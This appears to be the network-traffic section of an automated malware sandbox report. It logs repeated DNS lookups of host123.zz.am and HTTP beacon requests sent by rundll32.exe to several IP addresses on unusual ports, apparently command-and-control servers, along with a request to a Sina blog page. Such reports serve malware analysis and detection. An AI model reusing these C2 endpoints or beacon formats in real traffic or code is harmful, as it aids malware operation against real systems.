                                                                                                                                          Dec 19, 2024 15:34:00.003022909 CET5836153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:00.140690088 CET53583611.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:04.986938000 CET5627853192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:05.124629974 CET53562781.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:10.003093004 CET5655253192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:10.140242100 CET53565521.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:15.002093077 CET5032153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:15.139043093 CET53503211.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:20.001096964 CET6320553192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:20.300326109 CET53632051.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:25.048120022 CET6264153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:25.185214043 CET53626411.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:29.969777107 CET5111753192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:30.108648062 CET53511171.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:35.016968966 CET5074653192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:35.156018972 CET53507461.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:40.002347946 CET5998153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:40.139429092 CET53599811.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:44.974052906 CET5489753192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:45.112746954 CET53548971.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:49.972300053 CET5193053192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:50.114772081 CET53519301.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:54.971774101 CET6530653192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:34:55.109922886 CET53653061.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:59.957334995 CET5340253192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:00.097459078 CET53534021.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:04.957099915 CET5313053192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:05.095418930 CET53531301.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:09.955538988 CET5389553192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:10.093132973 CET53538951.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:14.954390049 CET6274953192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:15.093050003 CET53627491.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:19.443984032 CET6396853192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:19.955075026 CET5720753192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:20.092782974 CET53572071.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:20.453860044 CET6396853192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:20.521703005 CET53639681.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:20.590581894 CET53639681.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:24.955771923 CET5494053192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:25.092708111 CET53549401.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:29.998543024 CET5318953192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:30.135504007 CET53531891.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:34.964662075 CET5173653192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:35.102523088 CET53517361.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:39.955399036 CET6075353192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:40.093573093 CET53607531.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:44.955001116 CET5327853192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:45.092281103 CET53532781.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:49.953890085 CET5947853192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:50.091487885 CET53594781.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:54.955257893 CET6238753192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:35:55.093406916 CET53623871.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:59.958185911 CET5477153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:00.096070051 CET53547711.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.955344915 CET5993553192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:05.092508078 CET53599351.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:09.954659939 CET5248153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:10.092348099 CET53524811.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:14.960405111 CET5947153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:15.098854065 CET53594711.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:19.954546928 CET6004253192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:20.091823101 CET53600421.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:24.954143047 CET6014253192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:25.091156006 CET53601421.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:30.036650896 CET5028553192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:30.173522949 CET53502851.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:34.958167076 CET5618253192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:35.095870972 CET53561821.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:39.954237938 CET5776353192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:40.091298103 CET53577631.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:44.956803083 CET5651953192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:45.093962908 CET53565191.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:49.955600977 CET6333753192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:50.092592001 CET53633371.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:54.954875946 CET5542153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:36:55.094722033 CET53554211.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:59.960388899 CET6114353192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:37:00.097734928 CET53611431.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:04.955233097 CET5154353192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:37:05.092519045 CET53515431.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:09.955809116 CET5023953192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:37:10.092896938 CET53502391.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:14.954476118 CET5200353192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:37:15.091443062 CET53520031.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:19.983213902 CET6071553192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:37:20.120533943 CET53607151.1.1.1192.168.2.5

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Dec 19, 2024 15:33:40.355006933 CET192.168.2.51.1.1.10x9c32Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:44.970244884 CET192.168.2.51.1.1.10x390eStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:46.495070934 CET192.168.2.51.1.1.10xe157Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:50.021511078 CET192.168.2.51.1.1.10x402Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:54.955218077 CET192.168.2.51.1.1.10x4ed2Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:00.003022909 CET192.168.2.51.1.1.10x4a20Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:04.986938000 CET192.168.2.51.1.1.10xd5b3Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:10.003093004 CET192.168.2.51.1.1.10x6390Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:15.002093077 CET192.168.2.51.1.1.10xcd14Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:20.001096964 CET192.168.2.51.1.1.10xf81Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:25.048120022 CET192.168.2.51.1.1.10x9293Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:29.969777107 CET192.168.2.51.1.1.10xf602Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:35.016968966 CET192.168.2.51.1.1.10x57cfStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:40.002347946 CET192.168.2.51.1.1.10x4e75Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:44.974052906 CET192.168.2.51.1.1.10x34a0Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:49.972300053 CET192.168.2.51.1.1.10x5c97Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:54.971774101 CET192.168.2.51.1.1.10x61dStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:59.957334995 CET192.168.2.51.1.1.10xfe75Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:04.957099915 CET192.168.2.51.1.1.10x740dStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:09.955538988 CET192.168.2.51.1.1.10x1b56Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:14.954390049 CET192.168.2.51.1.1.10x3368Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:19.443984032 CET192.168.2.51.1.1.10x2d0cStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:19.955075026 CET192.168.2.51.1.1.10x5d3bStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:20.453860044 CET192.168.2.51.1.1.10x2d0cStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:24.955771923 CET192.168.2.51.1.1.10x638bStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:29.998543024 CET192.168.2.51.1.1.10x622bStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:34.964662075 CET192.168.2.51.1.1.10xe8dfStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:39.955399036 CET192.168.2.51.1.1.10x576fStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:44.955001116 CET192.168.2.51.1.1.10xba7eStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:49.953890085 CET192.168.2.51.1.1.10xe7aaStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:54.955257893 CET192.168.2.51.1.1.10x6552Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:59.958185911 CET192.168.2.51.1.1.10xf021Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:04.955344915 CET192.168.2.51.1.1.10x1af9Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:09.954659939 CET192.168.2.51.1.1.10x388aStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:14.960405111 CET192.168.2.51.1.1.10x3c46Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:19.954546928 CET192.168.2.51.1.1.10x8c8dStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:24.954143047 CET192.168.2.51.1.1.10xad45Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:30.036650896 CET192.168.2.51.1.1.10xea7aStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:34.958167076 CET192.168.2.51.1.1.10x31fdStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:39.954237938 CET192.168.2.51.1.1.10x526bStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:44.956803083 CET192.168.2.51.1.1.10x2e78Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:49.955600977 CET192.168.2.51.1.1.10xefb8Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:54.954875946 CET192.168.2.51.1.1.10x710aStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:59.960388899 CET192.168.2.51.1.1.10xfef4Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:04.955233097 CET192.168.2.51.1.1.10xe7f3Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:09.955809116 CET192.168.2.51.1.1.10x2f11Standard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:14.954476118 CET192.168.2.51.1.1.10x4eacStandard query (0)host123.zz.amA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:19.983213902 CET192.168.2.51.1.1.10xedc7Standard query (0)host123.zz.amA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Dec 19, 2024 15:33:41.301969051 CET1.1.1.1192.168.2.50x9c32Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:45.109034061 CET1.1.1.1192.168.2.50x390eName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:47.156048059 CET1.1.1.1192.168.2.50xe157No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:47.156048059 CET1.1.1.1192.168.2.50xe157No error (0)blogx.sina.com.cn116.133.8.92A (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:50.158442974 CET1.1.1.1192.168.2.50x402Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:33:55.093219042 CET1.1.1.1192.168.2.50x4ed2Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:00.140690088 CET1.1.1.1192.168.2.50x4a20Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:05.124629974 CET1.1.1.1192.168.2.50xd5b3Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:10.140242100 CET1.1.1.1192.168.2.50x6390Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:15.139043093 CET1.1.1.1192.168.2.50xcd14Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:20.300326109 CET1.1.1.1192.168.2.50xf81Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:25.185214043 CET1.1.1.1192.168.2.50x9293Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:30.108648062 CET1.1.1.1192.168.2.50xf602Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:35.156018972 CET1.1.1.1192.168.2.50x57cfName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:40.139429092 CET1.1.1.1192.168.2.50x4e75Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:45.112746954 CET1.1.1.1192.168.2.50x34a0Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:50.114772081 CET1.1.1.1192.168.2.50x5c97Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:34:55.109922886 CET1.1.1.1192.168.2.50x61dName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:00.097459078 CET1.1.1.1192.168.2.50xfe75Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:05.095418930 CET1.1.1.1192.168.2.50x740dName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:10.093132973 CET1.1.1.1192.168.2.50x1b56Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:15.093050003 CET1.1.1.1192.168.2.50x3368Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:20.092782974 CET1.1.1.1192.168.2.50x5d3bName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:20.521703005 CET1.1.1.1192.168.2.50x2d0cNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:20.521703005 CET1.1.1.1192.168.2.50x2d0cNo error (0)blogx.sina.com.cn116.133.8.92A (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:20.590581894 CET1.1.1.1192.168.2.50x2d0cNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:20.590581894 CET1.1.1.1192.168.2.50x2d0cNo error (0)blogx.sina.com.cn116.133.8.92A (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:25.092708111 CET1.1.1.1192.168.2.50x638bName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:30.135504007 CET1.1.1.1192.168.2.50x622bName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:35.102523088 CET1.1.1.1192.168.2.50xe8dfName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:40.093573093 CET1.1.1.1192.168.2.50x576fName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:45.092281103 CET1.1.1.1192.168.2.50xba7eName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:50.091487885 CET1.1.1.1192.168.2.50xe7aaName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:35:55.093406916 CET1.1.1.1192.168.2.50x6552Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:00.096070051 CET1.1.1.1192.168.2.50xf021Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:05.092508078 CET1.1.1.1192.168.2.50x1af9Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:10.092348099 CET1.1.1.1192.168.2.50x388aName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:15.098854065 CET1.1.1.1192.168.2.50x3c46Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:20.091823101 CET1.1.1.1192.168.2.50x8c8dName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:25.091156006 CET1.1.1.1192.168.2.50xad45Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:30.173522949 CET1.1.1.1192.168.2.50xea7aName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:35.095870972 CET1.1.1.1192.168.2.50x31fdName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:40.091298103 CET1.1.1.1192.168.2.50x526bName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:45.093962908 CET1.1.1.1192.168.2.50x2e78Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:50.092592001 CET1.1.1.1192.168.2.50xefb8Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:36:55.094722033 CET1.1.1.1192.168.2.50x710aName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:00.097734928 CET1.1.1.1192.168.2.50xfef4Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:05.092519045 CET1.1.1.1192.168.2.50xe7f3Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:10.092896938 CET1.1.1.1192.168.2.50x2f11Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:15.091443062 CET1.1.1.1192.168.2.50x4eacName error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 19, 2024 15:37:20.120533943 CET1.1.1.1192.168.2.50xedc7Name error (3)host123.zz.amnonenoneA (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • blog.sina.com.cn
                                                                                                                                          • 107.160.131.253:18659
                                                                                                                                          • 107.163.56.110:18530
                                                                                                                                          • 107.160.131.254:23588

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.549718107.160.131.253186595400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:17.452064037 CET171OUTGET //joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm@ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible)
                                                                                                                                          Host: 107.160.131.253:18659
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.549719107.163.56.110185305400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:17.452320099 CET185OUTGET /u1129.html HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.163.56.110:18530
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.549792107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:43.586338043 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.549794107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:43.586730957 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.549814107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:45.629937887 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.549815107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:45.631921053 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.549832116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:47.392971039 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:33:49.117685080 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:33:48 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
